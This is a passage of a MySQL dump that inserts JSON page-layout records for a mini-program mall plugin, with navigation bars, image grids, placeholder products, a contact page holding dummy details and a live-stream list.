ploads\\/allimg\\/20200518\\/1-20051Q00ZB36.png\",\"imgName\":\"icon-1.png\",\"url\":\"\",\"text\":\"\\u5168\\u90e8\\u5206\\u7c7b\",\"color\":\"#666666\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0},\"backgroundImage\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/navbar\\/03.png\",\"intro\":\"\\u526f\\u6587\\u672c8\",\"introcolor\":\"#666666\",\"background\":\"#ffffff\",\"bordercolor\":\"#eeeeee\"}]},{\"name\":\"\\u56fe\\u7247\\u6a71\\u7a97\",\"type\":\"window\",\"params\":{\"titleConf\":{\"text\":\"\\u6b64\\u5904\\u663e\\u793a\\u6807\\u9898\\u680f\\u540d\\u79f0\",\"showhide\":\"hide\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}},\"style\":{\"paddingTop\":\"0\",\"paddingLeft\":\"0\",\"background\":\"#ffffff\",\"layout\":\"3\"},\"data\":[{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q0304X55.png\",\"url\":\"\\/pages\\/article\\/list?typeid=3\",\"pathconf\":{\"index\":\"article_list\",\"value\":\"3\",\"is_vars\":1}},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q03056248.png\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05JY44.png\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}],\"dataNum\":4},{\"name\":\"\\u56fe\\u7247\\u6a71\\u7a97\",\"type\":\"window\",\"params\":{\"titleConf\":{\"text\":\"\\u6b64\\u5904\\u663e\\u793a\\u6807\\u9898\\u680f\\u540d\\u79f0\",\"showhide\":\"hide\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}},\"style\":{\"paddingTop\":\"0\",\"paddingLeft\":\"0\",\"background\":\"#ffffff\",\"layout\":\"4\"},\"data\":[{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q051551H.png\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05201Z3.png\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q0520I23.png\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05214135.png\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}],\"dataNum\":4},{\"name\":\"\\u8f85\\u52a9\\u7a7a\\u767d\",\"type\":\"blank\",\"style\":{\"height\":\"10\",\"background\":\"#f4f4f4\"}},{\"name\":\"\\u5546\\u54c1\\u7ec4\",\"type\":\"goods\",\"params\":{\"source\":\"auto\",\"auto\":{\"orderby\":\"default\",\"showNum\":6},\"choice\":[],\"titleConf\":{\"typeid\":0,\"text\":\"\\u4e3a\\u60a8\\u63a8\\u8350\",\"url\":\"\",\"showhide\":\"show\"}},\"style\":{\"background\":\"#ffffff\",\"display\":\"list\",\"column\":\"2\",\"show\":{\"title\":\"1\",\"usersPrice\":\"1\",\"oldPrice\":\"1\",\"seoDescription\":\"0\",\"stockCount\":\"0\",\"salesNum\":\"0\"}},\"defaultData\":[{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"}],\"data\":[]}],\"tabbar\":{\"name\":\"\\u5e95\\u90e8\\u83dc\\u5355\\u7ec4\",\"type\":\"tabBar\",\"style\":{\"color\":\"#666666\",\"selectedColor\":\"#e93b3d\",\"background\":\"#ffffff\"},\"adddata\":{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},\"data\":[{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/home.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q059363L.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/category\\/index\",\"text\":\"\\u5206\\u7c7b\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/cate.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05945328.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"category_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/flow\\/index\",\"text\":\"\\u8d2d\\u7269\\u8f66\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/flow.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10215415.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"flow_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/user\\/index\",\"text\":\"\\u6211\\u7684\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/user.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10223462.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"user_index\",\"value\":\"\",\"is_vars\":0}}],\"id\":4},\"diyStyle\":{\"titleModel\":{\"style\":4,\"text\":{\"source\":\"default\",\"default\":{\"size\":15,\"color\":\"#000000\"},\"custom\":{\"size\":15,\"color\":\"#000000\"}},\"linesbackground\":\"#00aeff\"},\"commonModel\":{\"background\":\"#f4f4f4\",\"navtitleTextColor\":\"black\",\"navtitleBackgroundColor\":\"#ffffff\"}}}', '3', '1', '1', '1', '0', 'cn', '1589423797', '1666062563');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('21', '1', '首页', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u9875\\u9762\\u6807\\u9898\",\"share_title\":\"\\u5206\\u4eab\\u6807\\u9898\"}},\"items\":[]}', '4', '1', '1', '1', '0', 'zh', '1666758479', '1666758479');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('22', '2', '分类频道', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u5206\\u7c7b\\u9891\\u9053\",\"share_title\":\"\\u5206\\u7c7b\\u9891\\u9053\"}},\"items\":[{\"name\":\"\\u5206\\u7c7b\\u9891\\u9053\",\"type\":\"category\",\"params\":{\"show_type\":20},\"style\":[]}]}', '4', '0', '1', '1', '0', 'zh', '1666758479', '1666758479');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('23', '3', '联系我们', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u8054\\u7cfb\\u6211\\u4eec\",\"share_title\":\"\\u8054\\u7cfb\\u6211\\u4eec\"}},\"items\":[{\"name\":\"\\u8054\\u7cfb\\u6211\\u4eec\",\"type\":\"contact\",\"params\":{\"titleConf\":{\"text\":\"\\u6b64\\u5904\\u663e\\u793a\\u6807\\u9898\\u680f\\u540d\\u79f0\",\"showhide\":\"show\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}},\"style\":{\"paddingTop\":\"10\",\"paddingLeft\":\"10\",\"background\":\"#ffffff\",\"borderBottomColor\":\"#eeeeee\"},\"data\":{\"logo\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/contact\\/logo.png\",\"banner\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/contact\\/banner.png\",\"web_name\":\"\\u67d0\\u67d0\\u7f51\\u7edc\\u79d1\\u6280\\u516c\\u53f8\",\"mobile\":\"13800000000\",\"weixin\":\"123456789\",\"qq\":\"10000\",\"email\":\"test@email.com\",\"address\":\"\\u6d77\\u5357\\u7701\\u6d77\\u53e3\\u5e02\",\"coordinate\":\"110.32552547126,20.044049439257\",\"nav_title\":\"\\u516c\\u53f8\\u7b80\\u4ecb\",\"content\":\"<p> \\u67d0\\u67d0\\u7f51\\u7edc\\u79d1\\u6280\\u6709\\u9650\\u516c\\u53f8\\u6210\\u7acb\\u4e8e2006\\u5e74\\uff0c\\u81f4\\u529b\\u884c\\u4e1a10\\u5e74\\uff0c\\u5f00\\u521b\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u5efa\\u7ad9\\u4e91\\u5e73\\u53f0\\uff0c\\u6253\\u9020\\u96c6\\u54cd\\u5e94\\u5f0f\\u7f51\\u7ad9\\u6280\\u672f\\u3001\\u4e91\\u7aef\\u67b6\\u6784\\u3001\\u6574\\u5408\\u8425\\u9500\\u4e3a\\u4e00\\u4f53\\u5546\\u4e1a\\u6a21\\u5f0f\\u3002\\u4f34\\u968f\\u7740\\u4e2d\\u56fd\\u4e92\\u8054\\u7f51\\u7684\\u6210\\u957f\\uff0c\\u7ecf\\u5386\\u4e86\\u4e92\\u8054\\u7f51\\u5feb\\u901f\\u53d1\\u5c55\\u768410\\u5e74\\uff0c\\u79ef\\u7d2f\\u4e86\\u96c4\\u539a\\u81ea\\u4e3b\\u7814\\u53d1\\u6280\\u672f\\u548c\\u4e30\\u5bcc\\u7684\\u54cd\\u5e94\\u5f0f\\u7f51\\u7ad9\\u5f00\\u53d1\\u6848\\u4f8b\\u3002<\\/p><p><br\\/><\\/p><p> \\u9762\\u5bf9\\u65e5\\u65b0\\u6708\\u5f02\\u7684\\u4e92\\u8054\\u7f51\\u8d8b\\u52bf\\uff0c2016\\u65d7\\u4e0b\\u201c\\u67d0\\u67d0\\u201c\\u54cd\\u5e94\\u5f0f\\u8425\\u9500\\u4e91\\u5e73\\u53f0\\uff0c\\u653b\\u514b\\u6280\\u672f\\u96be\\u9898\\uff0c\\u81ea\\u4e3b\\u6253\\u9020\\u4ee5SaaS\\u4e91\\u5e73\\u53f0\\u4e3a\\u6784\\u67b6\\uff0c\\u201c\\u5feb\\u901f\\u54cd\\u5e94\\u5f0f\\u5efa\\u7ad9+\\u5168\\u7ef4\\u5ea6\\u6574\\u5408\\u8425\\u9500\\u201d\\u4e3a\\u6838\\u5fc3\\uff0c\\u4ece\\u8fc7\\u53bb\\u5c40\\u9650\\u7684\\u5b9a\\u5236\\u5efa\\u7ad9\\u8fd0\\u8425\\u8f6c\\u53d8\\u4e3a\\u6574\\u5408\\u8425\\u9500\\u8fd0\\u8425\\uff0c\\u9886\\u5148\\u5b9e\\u73b0\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u6280\\u672f\\u548c\\u7f51\\u7ad9\\u53ef\\u89c6\\u5316\\u7f16\\u8f91\\u65b9\\u6848\\uff0c\\u4e0d\\u4ec5\\u63d0\\u4f9b\\u5168\\u8bbe\\u5907\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u7cfb\\u7edf\\u7684\\u529f\\u80fd\\uff0c\\u66f4\\u878d\\u5408\\u4e86\\u826f\\u597d\\u7684\\u7528\\u6237\\u4f53\\u9a8c\\u548c\\u591a\\u5c42\\u6b21\\u4f18\\u5316\\u6307\\u5bfc\\uff0c\\u6e17\\u900f\\u5230\\u4e92\\u8054\\u7f51+\\u7684\\u5168\\u7ef4\\u5ea6\\u6574\\u5408\\u8425\\u9500\\u8fd0\\u8425\\u7ba1\\u7406\\u4e2d\\uff0c\\u5176\\u521b\\u65b0\\u7684\\u5546\\u4e1a\\u6a21\\u5f0f\\u96c6\\u5408\\u4e86\\u4ea7\\u4e1a\\u94fe\\u7684\\u5173\\u952e\\u5143\\u7d20\\uff0c\\u771f\\u6b63\\u610f\\u4e49\\u4e0a\\u5177\\u5907\\u4e86\\u4f01\\u4e1a\\u53d1\\u5c55\\u9700\\u6c42\\u7684\\u6574\\u4f53\\u8425\\u9500\\uff0c\\u4e3a\\u4f01\\u4e1a\\u63d0\\u4f9b\\u591a\\u5143\\u3001\\u9ad8\\u6548\\u3001\\u6613\\u7528\\u7684\\u7f51\\u7ad9\\u7ba1\\u7406\\u65b9\\u5f0f\\uff0c\\u6ee1\\u8db3\\u4f01\\u4e1a\\u5404\\u4e2a\\u9636\\u6bb5\\u4e0d\\u540c\\u53d8\\u5316\\u7684\\u7cfb\\u7edf\\u5347\\u7ea7\\u3002<\\/p>\"}}]}', '4', '0', '1', '1', '0', 'zh', '1666758479', '1666758479');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('24', '1', '首页', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u9875\\u9762\\u6807\\u9898\",\"share_title\":\"\\u5206\\u4eab\\u6807\\u9898\"}},\"items\":[]}', '5', '1', '1', '1', '0', 'en', '1666758559', '1666758559');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('25', '2', '分类频道', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u5206\\u7c7b\\u9891\\u9053\",\"share_title\":\"\\u5206\\u7c7b\\u9891\\u9053\"}},\"items\":[{\"name\":\"\\u5206\\u7c7b\\u9891\\u9053\",\"type\":\"category\",\"params\":{\"show_type\":20},\"style\":[]}]}', '5', '0', '1', '1', '0', 'en', '1666758559', '1666758559');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('26', '3', '联系我们', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u8054\\u7cfb\\u6211\\u4eec\",\"share_title\":\"\\u8054\\u7cfb\\u6211\\u4eec\"}},\"items\":[{\"name\":\"\\u8054\\u7cfb\\u6211\\u4eec\",\"type\":\"contact\",\"params\":{\"titleConf\":{\"text\":\"\\u6b64\\u5904\\u663e\\u793a\\u6807\\u9898\\u680f\\u540d\\u79f0\",\"showhide\":\"show\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}},\"style\":{\"paddingTop\":\"10\",\"paddingLeft\":\"10\",\"background\":\"#ffffff\",\"borderBottomColor\":\"#eeeeee\"},\"data\":{\"logo\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/contact\\/logo.png\",\"banner\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/contact\\/banner.png\",\"web_name\":\"\\u67d0\\u67d0\\u7f51\\u7edc\\u79d1\\u6280\\u516c\\u53f8\",\"mobile\":\"13800000000\",\"weixin\":\"123456789\",\"qq\":\"10000\",\"email\":\"test@email.com\",\"address\":\"\\u6d77\\u5357\\u7701\\u6d77\\u53e3\\u5e02\",\"coordinate\":\"110.32552547126,20.044049439257\",\"nav_title\":\"\\u516c\\u53f8\\u7b80\\u4ecb\",\"content\":\"<p> \\u67d0\\u67d0\\u7f51\\u7edc\\u79d1\\u6280\\u6709\\u9650\\u516c\\u53f8\\u6210\\u7acb\\u4e8e2006\\u5e74\\uff0c\\u81f4\\u529b\\u884c\\u4e1a10\\u5e74\\uff0c\\u5f00\\u521b\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u5efa\\u7ad9\\u4e91\\u5e73\\u53f0\\uff0c\\u6253\\u9020\\u96c6\\u54cd\\u5e94\\u5f0f\\u7f51\\u7ad9\\u6280\\u672f\\u3001\\u4e91\\u7aef\\u67b6\\u6784\\u3001\\u6574\\u5408\\u8425\\u9500\\u4e3a\\u4e00\\u4f53\\u5546\\u4e1a\\u6a21\\u5f0f\\u3002\\u4f34\\u968f\\u7740\\u4e2d\\u56fd\\u4e92\\u8054\\u7f51\\u7684\\u6210\\u957f\\uff0c\\u7ecf\\u5386\\u4e86\\u4e92\\u8054\\u7f51\\u5feb\\u901f\\u53d1\\u5c55\\u768410\\u5e74\\uff0c\\u79ef\\u7d2f\\u4e86\\u96c4\\u539a\\u81ea\\u4e3b\\u7814\\u53d1\\u6280\\u672f\\u548c\\u4e30\\u5bcc\\u7684\\u54cd\\u5e94\\u5f0f\\u7f51\\u7ad9\\u5f00\\u53d1\\u6848\\u4f8b\\u3002<\\/p><p><br\\/><\\/p><p> \\u9762\\u5bf9\\u65e5\\u65b0\\u6708\\u5f02\\u7684\\u4e92\\u8054\\u7f51\\u8d8b\\u52bf\\uff0c2016\\u65d7\\u4e0b\\u201c\\u67d0\\u67d0\\u201c\\u54cd\\u5e94\\u5f0f\\u8425\\u9500\\u4e91\\u5e73\\u53f0\\uff0c\\u653b\\u514b\\u6280\\u672f\\u96be\\u9898\\uff0c\\u81ea\\u4e3b\\u6253\\u9020\\u4ee5SaaS\\u4e91\\u5e73\\u53f0\\u4e3a\\u6784\\u67b6\\uff0c\\u201c\\u5feb\\u901f\\u54cd\\u5e94\\u5f0f\\u5efa\\u7ad9+\\u5168\\u7ef4\\u5ea6\\u6574\\u5408\\u8425\\u9500\\u201d\\u4e3a\\u6838\\u5fc3\\uff0c\\u4ece\\u8fc7\\u53bb\\u5c40\\u9650\\u7684\\u5b9a\\u5236\\u5efa\\u7ad9\\u8fd0\\u8425\\u8f6c\\u53d8\\u4e3a\\u6574\\u5408\\u8425\\u9500\\u8fd0\\u8425\\uff0c\\u9886\\u5148\\u5b9e\\u73b0\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u6280\\u672f\\u548c\\u7f51\\u7ad9\\u53ef\\u89c6\\u5316\\u7f16\\u8f91\\u65b9\\u6848\\uff0c\\u4e0d\\u4ec5\\u63d0\\u4f9b\\u5168\\u8bbe\\u5907\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u7cfb\\u7edf\\u7684\\u529f\\u80fd\\uff0c\\u66f4\\u878d\\u5408\\u4e86\\u826f\\u597d\\u7684\\u7528\\u6237\\u4f53\\u9a8c\\u548c\\u591a\\u5c42\\u6b21\\u4f18\\u5316\\u6307\\u5bfc\\uff0c\\u6e17\\u900f\\u5230\\u4e92\\u8054\\u7f51+\\u7684\\u5168\\u7ef4\\u5ea6\\u6574\\u5408\\u8425\\u9500\\u8fd0\\u8425\\u7ba1\\u7406\\u4e2d\\uff0c\\u5176\\u521b\\u65b0\\u7684\\u5546\\u4e1a\\u6a21\\u5f0f\\u96c6\\u5408\\u4e86\\u4ea7\\u4e1a\\u94fe\\u7684\\u5173\\u952e\\u5143\\u7d20\\uff0c\\u771f\\u6b63\\u610f\\u4e49\\u4e0a\\u5177\\u5907\\u4e86\\u4f01\\u4e1a\\u53d1\\u5c55\\u9700\\u6c42\\u7684\\u6574\\u4f53\\u8425\\u9500\\uff0c\\u4e3a\\u4f01\\u4e1a\\u63d0\\u4f9b\\u591a\\u5143\\u3001\\u9ad8\\u6548\\u3001\\u6613\\u7528\\u7684\\u7f51\\u7ad9\\u7ba1\\u7406\\u65b9\\u5f0f\\uff0c\\u6ee1\\u8db3\\u4f01\\u4e1a\\u5404\\u4e2a\\u9636\\u6bb5\\u4e0d\\u540c\\u53d8\\u5316\\u7684\\u7cfb\\u7edf\\u5347\\u7ea7\\u3002<\\/p>\"}}]}', '5', '0', '1', '1', '0', 'en', '1666758559', '1666758559');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('20', '5', '直播列表', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u76f4\\u64ad\\u5217\\u8868\",\"share_title\":\"\\u5206\\u4eab\\u6807\\u9898\"}},\"items\":[{\"name\":\"\\u76f4\\u64ad\\u5217\\u8868\\u9875\",\"type\":\"liveListp\",\"params\":{\"start\":1,\"showNum\":10,\"titleConf\":{\"text\":\"\\u76f4\\u64ad\\u5217\\u8868\\u9875\",\"showhide\":\"hide\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}},\"style\":{\"background\":\"#ffffff\"},\"defaultData\":[{\"name\":\"\\u4e3b\\u64ad\\u540d\\u79f0\",\"live_status\":\"101\",\"live_status_text\":\"\\u76f4\\u64ad\\u4e2d\",\"title\":\"\\u76f4\\u64ad\\u95f4\\u6807\\u9898\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/02.jpg\",\"goodsList\":[{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/demo1.jpg\",\"price\":23.9},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/demo2.jpg\",\"price\":45}]},{\"name\":\"\\u4e3b\\u64ad\\u540d\\u79f0\",\"live_status\":\"102\",\"live_status_text\":\"\\u76f4\\u64ad\\u9884\\u544a\",\"title\":\"\\u76f4\\u64ad\\u95f4\\u6807\\u9898\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/03.jpg\",\"goodsList\":[{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/demo1.jpg\",\"price\":2591.9},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/demo2.jpg\",\"price\":4159}]},{\"name\":\"\\u4e3b\\u64ad\\u540d\\u79f0\",\"live_status\":\"103\",\"live_status_text\":\"\\u76f4\\u64ad\\u56de\\u653e\",\"title\":\"\\u76f4\\u64ad\\u95f4\\u6807\\u9898\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/04.jpg\",\"goodsList\":[{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/demo1.jpg\",\"price\":425},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/liveList\\/demo2.jpg\",\"price\":654}]}]}],\"tabbar\":{\"name\":\"\\u5e95\\u90e8\\u83dc\\u5355\\u7ec4\",\"type\":\"tabBar\",\"style\":{\"color\":\"#666666\",\"selectedColor\":\"#00aeff\",\"background\":\"#ffffff\"},\"adddata\":{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},\"data\":[{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/home.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/home-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/category\\/index\",\"text\":\"\\u5206\\u7c7b\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/cate.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/cate-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"category_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/contact\\/index\",\"text\":\"\\u8054\\u7cfb\\u6211\\u4eec\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/contact.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/contact-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"contact_view\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/flow\\/index\",\"text\":\"\\u8d2d\\u7269\\u8f66\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/flow.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/flow-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"flow_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/user\\/index\",\"text\":\"\\u4f1a\\u5458\\u4e2d\\u5fc3\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipr